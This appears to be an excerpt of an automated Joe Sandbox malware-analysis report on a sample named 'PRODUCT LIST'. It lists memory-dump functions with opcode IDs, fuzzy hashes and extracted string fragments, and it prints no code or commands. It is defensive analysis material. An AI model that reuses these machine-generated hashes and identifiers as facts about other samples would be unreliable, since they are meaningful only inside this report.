                                                                                        • Opcode ID: 74d45080d04428787bd8091fe374f424afd5fa129c57e4056f30e1bbf42a00be
                                                                                        • Instruction ID: 88e9b47129ed123ef4a496d5d51913172967053ff53b1d81608c3599b48bea72
                                                                                        • Opcode Fuzzy Hash: 74d45080d04428787bd8091fe374f424afd5fa129c57e4056f30e1bbf42a00be
                                                                                        • Instruction Fuzzy Hash: 64E0ED72A002189FDB54EEA9E454E9F7BEDEB44A25F1080A9E949D7380DE74EC408B90
                                                                                        Function 064DC0A8 Relevance: .0, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 682015979fde87953018424c5d20a725635e87c722ef560722436d01fec9abf3
                                                                                        • Instruction ID: f2befdabb4cf2aff2006238978800becddce5668ee1ae13e49245721f0e03c6a
                                                                                        • Opcode Fuzzy Hash: 682015979fde87953018424c5d20a725635e87c722ef560722436d01fec9abf3
                                                                                        • Instruction Fuzzy Hash: BBE08070E492444FD7D6E574EC719672E5E8BD5200F0540A7A901C7382DD554CC2C263
                                                                                        Function 064D0DC0 Relevance: .0, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9503dcaba9228f031f01b2c9f8daf3829623d788b309211b110b895e28cf0ee4
                                                                                        • Instruction ID: 2ad50f8133901a5cc0c90536efd19c89f9bec1e4a722968d1c8be3fa70a59375
                                                                                        • Opcode Fuzzy Hash: 9503dcaba9228f031f01b2c9f8daf3829623d788b309211b110b895e28cf0ee4
                                                                                        • Instruction Fuzzy Hash: 46E02632B843444BD324DABC9410B63BBCAAF48720F04407BE241CB794DE20EC40C394
                                                                                        Function 064DAB48 Relevance: .0, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6fec59246eb5d1099221030dada7c312de53371e68f202fa131d8fc50e24fbbc
                                                                                        • Instruction ID: cf363134d4f152f0e287f9b40124289005d953b66d0a56a1f27d0ed5ba4c7209
                                                                                        • Opcode Fuzzy Hash: 6fec59246eb5d1099221030dada7c312de53371e68f202fa131d8fc50e24fbbc
                                                                                        • Instruction Fuzzy Hash: CCE04870B142484FD7968A64B83566B2E9B9786610F050096E60187399DD554DC286E7
                                                                                        Function 064D8898 Relevance: .0, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f92d332ff26d6f2f67e03e70b13f15aa28cb3d9aefd075a010fe5bf0a3aba34
                                                                                        • Instruction ID: 4f3b8b7e15f08df00817df058e82847c47213dc7075da4640bf542f17b6869b2
                                                                                        • Opcode Fuzzy Hash: 8f92d332ff26d6f2f67e03e70b13f15aa28cb3d9aefd075a010fe5bf0a3aba34
                                                                                        • Instruction Fuzzy Hash: 33E012B1E041199FCB80EFBCD80159E77F4EF48210F1140A6D50AD7311EA309A008BD1
                                                                                        Function 064DAD20 Relevance: .0, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf1726f030c67d3661f7a2da9d6d9de739d0706ba3d42556e3ebdc55d1772fd9
                                                                                        • Instruction ID: cc99850919fa37aef5459f30e7e68c3d75581714a60115197a192e86925265c5
                                                                                        • Opcode Fuzzy Hash: bf1726f030c67d3661f7a2da9d6d9de739d0706ba3d42556e3ebdc55d1772fd9
                                                                                        • Instruction Fuzzy Hash: DFE0C2B3A443142FC7169EA85C50ECE7B998B49670F0148A6D94897281DE6299808AEA
                                                                                        Function 064D0AC8 Relevance: .0, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d87f8ed48da815650d608fb28f9ee0f7232ef05ddd6255686116fbe70356cb9
                                                                                        • Instruction ID: 523b88758c8b9cc0ec0b5e1818bb61f3cc289ff9109a4c890d22291f8db3e810
                                                                                        • Opcode Fuzzy Hash: 5d87f8ed48da815650d608fb28f9ee0f7232ef05ddd6255686116fbe70356cb9
                                                                                        • Instruction Fuzzy Hash: C5E01A71E00218AF8BC0EFB998155DEBBF9AF59610F10816BE458E7210E7309E14CBD0
                                                                                        Function 064D40C2 Relevance: .0, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 268aaadea4c2cf05571d8c9e0ce1a8bfaca190aa053ab59d380d9ee49100e593
                                                                                        • Instruction ID: 368b3c58efd382dd1ea0c8cce695f28d55da559edc91c14aef993f333da35e7d
                                                                                        • Opcode Fuzzy Hash: 268aaadea4c2cf05571d8c9e0ce1a8bfaca190aa053ab59d380d9ee49100e593
                                                                                        • Instruction Fuzzy Hash: 63D0A7A2D090A05BFF855A2BAC7966A2C42C3E4741F4104C361968A0AAE819C255D352
                                                                                        Function 064DC2F2 Relevance: .0, Instructions: 13COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 90b3830ceacc98763b64391c0b9b8a43bd1a8d60b4f38bdb2b05c20198eea22f
                                                                                        • Instruction ID: 141fc73e50646c26d5eda4bdc12043d2eb421864016976344aa0b910c05d7374
                                                                                        • Opcode Fuzzy Hash: 90b3830ceacc98763b64391c0b9b8a43bd1a8d60b4f38bdb2b05c20198eea22f
                                                                                        • Instruction Fuzzy Hash: A2D02231E803008DFFE24B108CE8B13AB9CAB887CAF808293800049590C6A48A02C261

                                                                                        Non-executed Functions

                                                                                        Function 064D1210 Relevance: 3.0, Strings: 2, Instructions: 509COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LR{q$s
                                                                                        • API String ID: 0-1131218625
                                                                                        • Opcode ID: 87318627ceb8fc0fc507cd0753fa44e776ad4a2010f71f4df7b79e87316a0d4b
                                                                                        • Instruction ID: 7df44ccd11ad010764776d8b41d96d3ef0059b69c7d402f743dd8ed7281d0c48
                                                                                        • Opcode Fuzzy Hash: 87318627ceb8fc0fc507cd0753fa44e776ad4a2010f71f4df7b79e87316a0d4b
                                                                                        • Instruction Fuzzy Hash: D41240B4E042099FDF08EBB9DC95ABEBBB6EF88300F504459E505AB351CB34AD41DB64
                                                                                        Function 0100DC90 Relevance: .4, Instructions: 372COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2199105778.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1000000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 468d2ff942b5b87a5ef21003c57fafcc303182e7e0e255fafd355fb531f87190
                                                                                        • Instruction ID: 5b0c9be8ac0ef2bb1e247d4f0f65b8148ae6f0988172841974efbfbea88ae8ff
                                                                                        • Opcode Fuzzy Hash: 468d2ff942b5b87a5ef21003c57fafcc303182e7e0e255fafd355fb531f87190
                                                                                        • Instruction Fuzzy Hash: 01D18070B002058FDB55DFB9C854AAEBBF6AF88340B148469E945DB3A1DF34DD418BA1
                                                                                        Function 064D59F2 Relevance: 15.1, Strings: 12, Instructions: 143COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q
                                                                                        • API String ID: 0-4094210962
                                                                                        • Opcode ID: d1698b5b9f77d9d1612cd65f765d1be634dfe186821787c46acbad668a438877
                                                                                        • Instruction ID: 612cfa7eb1efb6d9c4d3775880961c355b8c052efeeef9d32b3e031681eb6912
                                                                                        • Opcode Fuzzy Hash: d1698b5b9f77d9d1612cd65f765d1be634dfe186821787c46acbad668a438877
                                                                                        • Instruction Fuzzy Hash: 3E51E0B0A0020E9FEF05EFA4E852BAFB776FF84304F504628E5016F395DA796D458B91
                                                                                        Function 064D5A00 Relevance: 15.1, Strings: 12, Instructions: 140COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q$`Q{q
                                                                                        • API String ID: 0-4094210962
                                                                                        • Opcode ID: 667b0af7f18b5ea02321681b3c71fb18d7bd0764b685504b99b071f716a30231
                                                                                        • Instruction ID: a789e7ba23c8fc1ae7995518005b714fc8eb858e79af1b32c98c7dde95673b50
                                                                                        • Opcode Fuzzy Hash: 667b0af7f18b5ea02321681b3c71fb18d7bd0764b685504b99b071f716a30231
                                                                                        • Instruction Fuzzy Hash: C051E0B0A0020E9FEF05EFA4E852BAFB776FF44304F504628E5016B391DA796D458B91
                                                                                        Function 064DC75A Relevance: 10.5, Strings: 8, Instructions: 468COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (_{q$(_{q$${q$${q$${q$${q$${q$[wnl^
                                                                                        • API String ID: 0-2200291618
                                                                                        • Opcode ID: b339cc933f0c8b6a9e14fa1ffba11c4f8e4eb2322073782e8cd52925724556e5
                                                                                        • Instruction ID: 948837b26e016f4f5bc48d3f8069d820a3ad085b0942bcc323080834a9b22ccd
                                                                                        • Opcode Fuzzy Hash: b339cc933f0c8b6a9e14fa1ffba11c4f8e4eb2322073782e8cd52925724556e5
                                                                                        • Instruction Fuzzy Hash: 51225CB0A00208DFDB14EFA8D851BAEBBB6FF84300F1095A9D115BB251DB39AE45DF51
                                                                                        Function 064DC768 Relevance: 10.5, Strings: 8, Instructions: 464COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205648406.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_64d0000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (_{q$(_{q$${q$${q$${q$${q$${q$[wnl^
                                                                                        • API String ID: 0-2200291618
                                                                                        • Opcode ID: a58cda9d3d729720a00336332b87140b4d8488f2d547c57935db6a64e9d33fd5
                                                                                        • Instruction ID: df1c381e11e3b2a85ce761235dc817b0783ff02472444e6231104949d92a2847
                                                                                        • Opcode Fuzzy Hash: a58cda9d3d729720a00336332b87140b4d8488f2d547c57935db6a64e9d33fd5
                                                                                        • Instruction Fuzzy Hash: 2B224BB0A00208DFDB14EFA8D851BAEBBB6FF84300F1095A9D115BB251DB39AE45DF51
                                                                                        Function 06520D50 Relevance: 10.3, Strings: 8, Instructions: 297COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2205726688.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6520000_PRODUCT LIST.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ${q$${q$${q$${q$${q$${q$${q$${q
                                                                                        • API String ID: 0-2300892640
                                                                                        • Opcode ID: 90971c948319db9ffe5617bdbdb934e34aeaa998477ad291b62f2068ef392d0e
                                                                                        • Instruction ID: cf1b46bbc91cb49b13d180d9c55200e8f11016a9898f01b51dfbefbedd2fe8ca
                                                                                        • Opcode Fuzzy Hash: 90971c948319db9ffe5617bdbdb934e34aeaa998477ad291b62f2068ef392d0e
                                                                                        • Instruction Fuzzy Hash: B4B1CD30B012569FDB549B69C8549AEBBF6BF8A300F14846AE406DB7E1DB34DC41CB90